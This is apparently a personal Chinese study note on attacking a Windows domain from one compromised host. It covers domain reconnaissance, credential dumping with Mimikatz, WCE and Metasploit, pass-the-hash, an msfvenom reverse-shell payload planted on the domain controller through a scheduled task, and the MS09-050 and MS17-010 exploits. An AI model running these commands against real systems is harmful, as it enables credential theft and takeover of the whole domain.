内网域渗透学习小结
总结的思路可能有些乱 - - 当做个记录而已。
获取域中某台机器控制权后
渗透思路就是拿下域控的权限 实现对整个域的控制
0x01信息收集:
-
ipconfig /all
2.net view /domain 查看有几个域
3.net view /domain:XXX 查看此域内电脑
4.net group /domain 查询域里面的组
5.net group “domain admins” /domain 查看域管理员
6.net group “domain controllers” /domain 查看域控制器
7.net group “enterprise admins” /domain 查看企业管理
知道了所在域和域控的ip后(一般域控和dns为同一台服务器)
明确渗透思路:
从域主机入手:抓取域主机HASH--->登录到域进行域控的shell反弹或者在域主机上进行hash注入 登录到域控伪造ticket(pass the ticket)
直接从域控入手:0day溢出漏洞(smb、rdp、rpc、dns)、各种服务弱口令爆破、hash注入读取lsa明文密码
Ps:拿到域主机或者域控可能会遇到很多安全策略端口限制
利用lcx portfwd这些工具进行端口映射、端口转发 再进行3389连接
- 1.使用WCE和MIMIKATZ(这2个工具必须要管理员的权限,而且注意工具的免杀)
- 2.使用MSF的hashdump模块,一个是hashdump,只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash
- 3.使用Powershell模块直接导出
抓取hash工具使用笔记:
1) WCE
常用参数
-l 默认的参数 列出登录的会话和NTLM凭据(默认值)
-w 通过摘要式认证缓存一个明文的密码
-s (hash注入 根本登录凭据 即不需破出hash的明文密码也可登录管理)格式:wce.exe -s 用户名:对方机器名或者ip:LM-HASH:NT-HASH
hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。hash注入本身是为了对付那些破解不了的NTHASH。
2)MIMIKATZ
第一条:privilege::debug//提升权限
第二条:sekurlsa::logonpasswords//抓取密码
3)使用msf中的两个hash抓取模块
hashdump,只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash
4)使用Powershell模块直接导出
获取了受控这台域主机后 下一步渗透就是接近我们的域控目标
分两种情况
|
A.如果不能直接攻击域服务器,我们需要再攻击内网某个服务器,然后再攻击域服务器 B.可以直接攻击域服务器 1.我们可以利用抓到的密码加上我们收集的信息编个字典,然后添加路由进行弱口令的扫描 |
对于情况B:
使用抓取的账号密码 登录到域控的ipc连接 添加任务 让域主机定时执行我们用VEIL生成的meterpreter(或者msfvenom) 进行shell反弹
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe
生成shell.exe服务端
受控域主机 ipc连接域控
Net use \域控ip 密码 /user:域名用户名
查看共享目录
Copy命令上传我们的shell.exe at命令定时执行
At \域控ip 时间 任务路径
不过默认win2008没有开启计划服务
Msf监听反弹的木马
域控计划执行shell.exe
成功反弹域控shell
接着就是在域控上进行抓取hash
可以用Mimikatz也可以用run post/windows/gather/hashdump
这里我使用msf的hash抓取
显示权限不够
Getsystem一下
再次抓取域控hash
抓取成功
抓取成功后进行hash注入 注入域管理帐号 拿到域控
还有对域控直接攻击的方法就是远程溢出漏洞
先用nmap扫描探测常见的漏洞
发现
CVE-2009-3103存在此漏洞
上网查找了这个漏洞对应的ms漏洞编号
使用msf 利用ms09_050 进行溢出提权
拿下域控
同样 看到开放了445 通过ms17_010一样可以溢出提权
至于弱口令爆破 没有尝试 因为域控的密码策略都是小写大小特殊符号的组合 就一般不对域控进行弱口令爆破
